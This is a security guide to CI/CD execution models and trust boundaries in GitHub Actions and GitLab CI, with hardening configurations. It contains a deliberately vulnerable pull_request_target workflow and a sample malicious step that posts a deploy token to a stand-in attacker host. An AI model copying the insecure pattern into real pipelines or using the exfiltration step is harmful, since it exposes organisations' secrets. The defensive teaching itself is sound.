CI/CD Execution Models and Trust Assumptions: A Security Guide

Introduction

CI/CD pipelines are among the most privileged components in any modern software organization. They clone source code, access secrets, build artifacts, and deploy to production — often with minimal human oversight. Yet despite this extraordinary level of access, the trust models underpinning these pipelines are rarely made explicit.

When a pipeline runs, it implicitly answers a chain of security questions: Who triggered this execution? What code is being run? What identity does the pipeline assume? What resources can it reach? In most organizations, these questions are answered by default configurations rather than deliberate security decisions.

This guide maps out how different CI/CD execution models work, where trust is assumed versus verified, and how to harden your pipelines against the real-world attack patterns that exploit these gaps. Whether you’re running GitHub Actions, GitLab CI, or another platform, the underlying trust dynamics are universal — and understanding them is essential to securing your software supply chain.

What Is a CI/CD Execution Model?

A CI/CD execution model defines the full lifecycle of how pipeline code is triggered, where it physically runs, what identity it assumes during execution, and what resources it can access. It is, in essence, the security architecture of your automation layer.

Every execution model must answer four fundamental questions:

  • Trigger: What event initiates the pipeline, and who or what is authorized to cause that event?
  • Environment: Where does the pipeline code execute — on what infrastructure, with what OS, and with what degree of isolation?
  • Identity: What credentials, tokens, or service accounts does the running pipeline possess?
  • Access: What downstream systems, secrets, registries, and deployment targets can the pipeline reach?

The way these questions are answered varies dramatically across execution environments:

SaaS-Hosted Runners

Platforms like GitHub Actions (GitHub-hosted runners) and GitLab.com shared runners provide ephemeral virtual machines managed by the CI/CD vendor. Each job typically gets a fresh VM that is destroyed after execution. The platform manages patching, isolation, and lifecycle. The trade-off is that you trust the vendor’s isolation guarantees — you cannot inspect or control the underlying infrastructure.

Self-Hosted Runners

Organizations deploy their own runner agents on infrastructure they control — VMs, bare metal, or Kubernetes pods. This gives full control over the execution environment but shifts the responsibility for isolation, patching, and credential management entirely to the operator. A misconfigured self-hosted runner is one of the most common vectors for lateral movement in CI/CD attacks.

Containerized Execution

Many pipelines run jobs inside containers, either on self-hosted infrastructure or on managed Kubernetes clusters. Container-based execution provides process-level isolation and reproducible environments, but containers are not security boundaries in the same way VMs are. Shared kernel access, mounted volumes, and Docker socket exposure can all undermine the isolation model.

Serverless and On-Demand Execution

Some modern CI/CD systems (such as AWS CodeBuild or certain Buildkite configurations) spin up entirely on-demand compute for each job. These models offer strong isolation guarantees since each execution gets a dedicated, short-lived compute instance, but they introduce complexity around credential bootstrapping and network access control.

Understanding which model your organization uses — and the security properties it does and does not provide — is the foundation for reasoning about CI/CD trust.

Trust Boundaries in CI/CD

A trust boundary exists wherever control passes from one entity or system to another. In CI/CD, there are several critical trust boundaries, and failures at any of them can lead to full pipeline compromise.

Source Code Repository to Pipeline Trigger

The first trust boundary is between the code repository and the pipeline trigger mechanism. When a developer pushes a commit or opens a pull request, the CI/CD platform decides whether and how to execute a pipeline. The critical question is: who can trigger pipeline execution, and can they control what code the pipeline runs?

In many configurations, anyone who can open a pull request — including external contributors to public repositories — can trigger pipeline execution. If the pipeline definition itself comes from the PR branch, the contributor effectively controls the code that runs in your CI environment.

Pipeline Definition to Execution Environment

The second trust boundary separates the pipeline definition (the YAML file, the Jenkinsfile, the build script) from the environment where it executes. Key questions include: Does the runner have access to the network? Can the pipeline install arbitrary software? Can it modify the runner itself for future jobs?

On shared or persistent runners, a malicious pipeline definition could install a backdoor that persists across subsequent job executions — affecting entirely different repositories and teams.

Execution Environment to Secrets and Credentials

Pipelines need credentials to do useful work: API tokens, cloud provider keys, registry passwords, signing keys. The trust boundary between the execution environment and the secrets store determines what a compromised pipeline can access. Over-broad secret access is one of the most common and dangerous misconfigurations in CI/CD.

Build Output to Deployment Target

The final trust boundary is between what the pipeline produces (a container image, a binary, a Terraform plan) and the system where that output is deployed. If the pipeline identity that builds an artifact is the same identity that deploys it to production, there is no separation of duties. A single compromised build step can lead directly to production compromise.

Mapping the Trust Zones

Conceptually, a CI/CD pipeline traverses four trust zones:

Zone 1: Source Control (Developer workstations, branches, PRs)
   ↓ [Trigger boundary]
Zone 2: Pipeline Definition (YAML/config parsed by CI platform)
   ↓ [Execution boundary]
Zone 3: Execution Environment (Runner, container, VM — with secrets)
   ↓ [Deployment boundary]
Zone 4: Deployment Targets (Production, staging, registries, cloud APIs)

Each arrow represents a trust boundary. Security controls should exist at every transition: branch protection rules at the trigger boundary, runner isolation at the execution boundary, scoped credentials at the secrets boundary, and deployment approvals at the deployment boundary.

GitHub Actions Execution Model

GitHub Actions is one of the most widely adopted CI/CD platforms, and its execution model has several unique trust characteristics worth understanding in depth.

GitHub-Hosted vs Self-Hosted Runners

GitHub-hosted runners are ephemeral VMs provisioned by GitHub for each job. They run on Azure infrastructure, are destroyed after each job completes, and provide strong isolation between jobs. Self-hosted runners, by contrast, are machines you register with GitHub. They persist between jobs, can accumulate state, and — critically — any repository in the organization with access to the runner can execute code on it.

For self-hosted runners, GitHub explicitly warns: do not use self-hosted runners with public repositories. Any fork can submit a pull request that triggers a workflow, and that workflow executes on your infrastructure with your network access.
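If a self-hosted runner must serve a repository that accepts pull requests, one common mitigation is to gate jobs so they only run for branches in the same repository. A sketch (job name, labels, and script path are illustrative):

```yaml
# Sketch: run this job on a self-hosted runner only for same-repo PRs, never forks
jobs:
  internal-tests:
    # head.repo.full_name differs from github.repository when the PR comes from a fork
    if: github.event.pull_request.head.repo.full_name == github.repository
    runs-on: [self-hosted, linux]
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/run-tests.sh   # hypothetical test script
```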

GITHUB_TOKEN Permissions and Scope

Every workflow run receives an automatic GITHUB_TOKEN with permissions scoped to the repository. Depending on your repository and organization settings, this token can have broad read/write permissions to repository contents, packages, issues, and more — the historical default, and still common in older repositories. The permissions key allows you to restrict this token to only what’s needed:

permissions:
  contents: read
  packages: write
  id-token: write   # For OIDC federation

Setting top-level permissions to read-all or even empty ({}) and then granting specific permissions per job is a critical hardening step. Without this, any compromised step in any job has write access to your repository.

Fork PR Workflows: pull_request vs pull_request_target

This is one of the most dangerous trust boundaries in GitHub Actions. The pull_request event runs the workflow definition from the PR’s head branch — meaning the contributor controls the workflow code — but critically, it does not have access to repository secrets. The pull_request_target event runs the workflow from the base branch (your repository’s main branch) but does have access to secrets.

The danger arises when pull_request_target workflows check out the PR’s head branch code:

# DANGEROUS: pull_request_target with explicit checkout of PR code
on: pull_request_target

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      # This now runs UNTRUSTED CODE with access to SECRETS
      - run: npm install && npm test

This pattern gives an attacker the ability to execute arbitrary code with access to your repository’s secrets. It is the canonical example of poisoned pipeline execution in GitHub Actions.
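A safer alternative is to split the work across two workflows: an unprivileged workflow runs the untrusted PR code with no secrets, and a separate privileged workflow, triggered by workflow_run, consumes only its outputs and never executes PR code. A sketch under assumed workflow names and file paths:

```yaml
# File 1: .github/workflows/test-pr.yml — runs untrusted PR code, no secrets
name: test-pr
on: pull_request
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm install && npm test
---
# File 2: .github/workflows/pr-results.yml — privileged, never checks out
# or executes the PR's code; processes only artifacts from the untrusted run
name: pr-results
on:
  workflow_run:
    workflows: [test-pr]
    types: [completed]
permissions:
  pull-requests: write
jobs:
  report:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Download and process artifacts from the untrusted run here"
```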

Reusable Workflows and Trust Delegation

Reusable workflows allow you to centralize pipeline logic in a shared repository and call it from other repositories. When a reusable workflow is invoked, it runs with the permissions of the calling workflow and with whatever secrets the caller passes to it (explicitly or via secrets: inherit). This creates a trust delegation chain: you’re trusting that the reusable workflow code (in another repository) will handle your secrets responsibly.

Pin reusable workflows to a specific commit SHA, not a branch or tag:

jobs:
  deploy:
    uses: my-org/shared-workflows/.github/workflows/deploy.yml@a1b2c3d4e5f6
    secrets: inherit
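On the providing side, the reusable workflow declares a workflow_call trigger along with the inputs and secrets it expects. A minimal sketch (file path, input, and secret names are assumptions):

```yaml
# my-org/shared-workflows/.github/workflows/deploy.yml (sketch)
on:
  workflow_call:
    inputs:
      environment:
        required: true
        type: string
    secrets:
      DEPLOY_TOKEN:
        required: true
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - run: ./deploy.sh "${{ inputs.environment }}"
        env:
          DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
```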

Environment Protection Rules

GitHub Environments provide a critical trust boundary for deployment workflows. You can configure required reviewers, wait timers, and branch restrictions on environments. When a job references an environment, it must satisfy the protection rules before secrets associated with that environment are made available:

jobs:
  deploy-production:
    runs-on: ubuntu-latest
    environment:
      name: production
      url: https://example.com
    steps:
      - name: Deploy
        run: ./deploy.sh
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.PROD_AWS_KEY }}

This ensures that even if a workflow is triggered, production credentials are not exposed without human approval.

GitLab CI Execution Model

GitLab CI has a different execution model with its own trust characteristics, particularly around runner scoping and variable protection.

Shared Runners vs Group Runners vs Project Runners

GitLab offers three levels of runner scoping. Shared runners (on GitLab.com, these are managed by GitLab) are available to all projects. Group runners are available to all projects within a GitLab group. Project runners are dedicated to a single project. The scoping determines the blast radius of a compromised runner — a shared runner compromise affects all projects, while a project runner compromise is contained to one project.

For sensitive workloads, always prefer project-specific runners with appropriate tagging:

deploy-production:
  stage: deploy
  tags:
    - production-runner
    - isolated
  script:
    - ./deploy.sh
  rules:
    - if: $CI_COMMIT_BRANCH == "main"

Protected Branches and Protected Variables

GitLab’s protected variable mechanism is a key trust control. Variables marked as “protected” are only exposed to pipelines running on protected branches or protected tags. This means that a pipeline triggered by a merge request from a feature branch — or worse, from a fork — will not have access to protected variables.

This is GitLab’s primary mechanism for preventing secret exposure to untrusted code:

# In .gitlab-ci.yml, protected variables are only available on protected branches
deploy:
  stage: deploy
  script:
    - echo "Deploying with $PRODUCTION_API_KEY"
  rules:
    - if: $CI_COMMIT_BRANCH == "main"  # main is a protected branch
  environment:
    name: production

CI_JOB_TOKEN Scope and Limitations

Every GitLab CI job receives a CI_JOB_TOKEN, an automatically generated token scoped to the project. Depending on your GitLab version and settings, this token may be able to access other projects’ resources, which creates an implicit trust relationship. GitLab allows you to restrict CI_JOB_TOKEN access by configuring an allowlist of projects that can be accessed — a critical hardening step that limits lateral movement if a pipeline is compromised.

In your project settings under CI/CD → Token Access, restrict the token scope to only the projects your pipeline genuinely needs to interact with.
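As a concrete example, a job can use the token to clone an allowlisted sibling project. A sketch (the instance hostname and project path are placeholders):

```yaml
fetch-shared-lib:
  stage: build
  script:
    # Succeeds only if this project is on the target project's token allowlist
    - git clone https://gitlab-ci-token:${CI_JOB_TOKEN}@gitlab.example.com/my-group/shared-lib.git
```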

Merge Request Pipelines and Trust Boundaries

GitLab distinguishes between branch pipelines and merge request pipelines. Merge request pipelines run in the context of the merge request and expose additional merge-request-specific predefined variables. For pipelines triggered by merge requests from forks, GitLab does not expose protected variables or project-level secrets — this is an intentional trust boundary.

However, pipelines running on the merged result (the merge_request_event with merged results pipelines enabled) still execute the code from the fork. If your pipeline definition allows arbitrary code execution and the job has access to secrets through non-protected variables, this can still be exploited.

Common Trust Assumption Failures

Understanding the execution models is important, but the real value comes from recognizing the patterns that lead to compromise. These are the trust assumption failures that appear repeatedly in real-world CI/CD breaches.

Poisoned Pipeline Execution (PPE)

Poisoned pipeline execution occurs when an attacker can modify the pipeline definition that runs in a privileged context. This is the most prevalent class of CI/CD vulnerability. It happens when:

  • A pull request triggers a workflow that uses the PR’s version of the pipeline file
  • That workflow has access to secrets or deployment credentials
  • There is no review or approval gate between the PR and the pipeline execution

The attacker modifies the pipeline YAML (or a script it calls) to exfiltrate secrets, inject backdoors into build artifacts, or pivot to internal systems.
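To illustrate how small the change can be (the attacker domain and secret name below are hypothetical), the entire exploit can be a single step added to a workflow that runs with secrets:

```yaml
# Hypothetical malicious step slipped into a PR's workflow file
- name: Run tests            # innocuous-looking name
  run: |
    curl -s -X POST https://attacker.example/collect \
      -d "token=${{ secrets.DEPLOY_TOKEN }}"
```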

Assuming Runner Isolation on Shared Infrastructure

When multiple teams or projects share runners — especially self-hosted runners — there is often an implicit assumption of isolation that does not actually exist. A job running on a shared self-hosted runner may be able to:

  • Read files left behind by previous jobs (cached credentials, build artifacts)
  • Access the Docker socket and inspect or modify other containers
  • Reach internal network resources available to the runner host
  • Install persistent backdoors on the runner for future jobs

Over-Permissioned Service Accounts

A disturbingly common pattern is giving the CI/CD service account broad administrative access — “just to make things work.” An AWS IAM role with AdministratorAccess, a Kubernetes service account with cluster-admin, or a cloud SQL account with DBA privileges. When any step in the pipeline is compromised, the attacker inherits all of these permissions.
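In Kubernetes, for instance, the fix is a namespace-scoped Role granting only the verbs the pipeline actually uses, instead of binding cluster-admin. A sketch (namespace, name, and rule list are assumptions about a typical deploy job):

```yaml
# Least-privilege alternative to cluster-admin for a CI deploy account
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: staging          # assumed namespace
  name: ci-deployer
rules:
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["get", "list", "patch"]   # enough to roll out a new image, nothing more
```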

Implicit Trust in Third-Party Actions and Templates

Using community GitHub Actions or GitLab CI templates means executing someone else’s code in your pipeline with your secrets. When you reference uses: some-org/some-action@v2, you’re trusting that:

  • The action’s code is not malicious
  • The action’s maintainers haven’t been compromised
  • The v2 tag hasn’t been moved to point to different code
  • The action’s dependencies are trustworthy

Tag references are mutable. An attacker who compromises an action’s repository can move the v2 tag to a malicious commit, and every pipeline referencing that tag will execute the new code on its next run.

Build-Time vs Deploy-Time Identity Confusion

Many pipelines use a single identity (service account, IAM role, or token) for both building and deploying. This conflation means that a compromise during the build phase — which handles untrusted code — gives direct access to deployment targets. The build identity should only be able to produce artifacts. A separate, more restricted deploy identity should be used for deploying those artifacts to production.

Hardening Trust Assumptions

With the threat model clear, here are the concrete mitigations that align controls to trust boundaries.

Explicit Trigger Conditions and Branch Filters

Never allow unrestricted pipeline triggers. Limit what events can trigger what workflows, and ensure that privileged pipelines only run on trusted branches:

# GitHub Actions: restrict deployment to main branch only
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
    # Only trigger on PRs targeting main; fork PR code runs without secrets

jobs:
  deploy:
    if: github.event_name == 'push' && github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh

# GitLab CI: use rules to restrict sensitive jobs
deploy-production:
  stage: deploy
  script:
    - ./deploy.sh
  rules:
    - if: $CI_COMMIT_BRANCH == "main" && $CI_PIPELINE_SOURCE != "merge_request_event"
      when: manual
      allow_failure: false
  environment:
    name: production

Minimal Token Permissions

Apply the principle of least privilege to every token in your pipeline. In GitHub Actions, set restrictive default permissions and grant specific permissions per job:

# Set restrictive defaults at the workflow level
permissions: read-all

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm run build

  deploy:
    needs: build
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write  # Only for OIDC, no write to repo
    environment: production
    steps:
      - run: ./deploy.sh

In GitLab, restrict CI_JOB_TOKEN scope in project settings and use protected variables exclusively for sensitive credentials.

Ephemeral, Isolated Runners

Wherever possible, use ephemeral runners that are created fresh for each job and destroyed immediately after. This eliminates persistence-based attacks and cross-job data leakage. For self-hosted environments, tools like GitHub’s Actions Runner Controller (ARC) for Kubernetes or GitLab’s autoscaling runner on AWS/GCP can provision ephemeral runner pods or VMs for each job.

Key properties of a hardened runner configuration:

  • No persistent storage between jobs
  • No shared Docker socket
  • Network segmentation limiting access to only required endpoints
  • No ability for the job to modify the runner’s own configuration
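As one way to get these properties on Kubernetes, the legacy actions-runner-controller CRDs support an ephemeral flag that replaces the runner pod after every job. A sketch (the repository value is a placeholder; field names follow the ARC documentation):

```yaml
# Sketch: ephemeral self-hosted runners via actions-runner-controller (legacy CRD)
apiVersion: actions.summerwind.dev/v1alpha1
kind: RunnerDeployment
metadata:
  name: ephemeral-runners
spec:
  replicas: 2
  template:
    spec:
      repository: my-org/my-repo   # assumed repository
      ephemeral: true              # runner deregisters and the pod is replaced after one job
```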

Pinning Actions and Images by SHA

Mutable references (branch names, tags like v2) can be changed by upstream maintainers — or attackers. Pinning to a specific commit SHA ensures that the exact code you reviewed is what runs in your pipeline:

# Instead of this (mutable tag):
- uses: actions/checkout@v4

# Use this (immutable SHA):
- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v4.1.1

The same principle applies to container images. Use image digests instead of tags:

# Instead of:
image: node:20-alpine

# Use:
image: node@sha256:a1b2c3d4e5f6...  # pin to specific digest

Tools like Dependabot and Renovate can automatically create PRs to update pinned SHAs when new versions are released, so you get both security and maintainability.
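A minimal Dependabot configuration for keeping pinned actions current looks like this (the weekly schedule is a matter of taste):

```yaml
# .github/dependabot.yml
version: 2
updates:
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
```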

Separating Build and Deploy Identities

Implement distinct identities for build and deploy phases. The build identity should have:

  • Read access to source code
  • Write access to artifact storage (container registry, S3 bucket)
  • No access to production environments

The deploy identity should have:

  • Read access to artifact storage
  • Write access to the specific deployment target
  • No access to source code or the ability to trigger builds

Use OIDC federation where possible to eliminate long-lived credentials entirely. Both GitHub Actions and GitLab CI support OIDC tokens that can be exchanged for short-lived cloud provider credentials:

# GitHub Actions OIDC with AWS
jobs:
  deploy:
    permissions:
      id-token: write
      contents: read
    steps:
      - uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
        with:
          role-to-assume: arn:aws:iam::123456789012:role/deploy-production
          aws-region: us-east-1

# GitLab CI OIDC with AWS
deploy:
  stage: deploy
  id_tokens:
    AWS_TOKEN:
      aud: https://gitlab.com
  script:
    - >
      STS_CREDENTIALS=$(aws sts assume-role-with-web-identity
      --role-arn arn:aws:iam::123456789012:role/deploy-production
      --web-identity-token $AWS_TOKEN
      --role-session-name "gitlab-ci-${CI_JOB_ID}")
    - export AWS_ACCESS_KEY_ID=$(echo $STS_CREDENTIALS | jq -r '.Credentials.AccessKeyId')
    - export AWS_SECRET_ACCESS_KEY=$(echo $STS_CREDENTIALS | jq -r '.Credentials.SecretAccessKey')
    - export AWS_SESSION_TOKEN=$(echo $STS_CREDENTIALS | jq -r '.Credentials.SessionToken')
    - ./deploy.sh

Conclusion

Every CI/CD pipeline has a trust model. The question is whether that trust model was designed intentionally or emerged accidentally from default configurations and quick fixes.

The execution model you choose — SaaS-hosted, self-hosted, containerized, or serverless — determines the baseline security properties of your pipeline. But the execution model alone is not enough. Trust must be explicitly bounded at every transition: from source code to trigger, from trigger to execution, from execution to secrets, and from build to deployment.

The patterns covered in this guide — poisoned pipeline execution, shared runner abuse, over-permissioned identities, mutable action references, and conflated build/deploy identities — are not theoretical. They are the actual techniques used in real-world supply chain attacks, from the SolarWinds compromise to the Codecov breach and beyond.

Start by mapping your current trust boundaries. Identify where trust is assumed rather than verified. Then apply the hardening measures systematically: restrict triggers, minimize permissions, isolate runners, pin dependencies, and separate identities. Treat your CI/CD pipeline with the same rigor you apply to your production infrastructure — because in practice, it is your production infrastructure’s front door.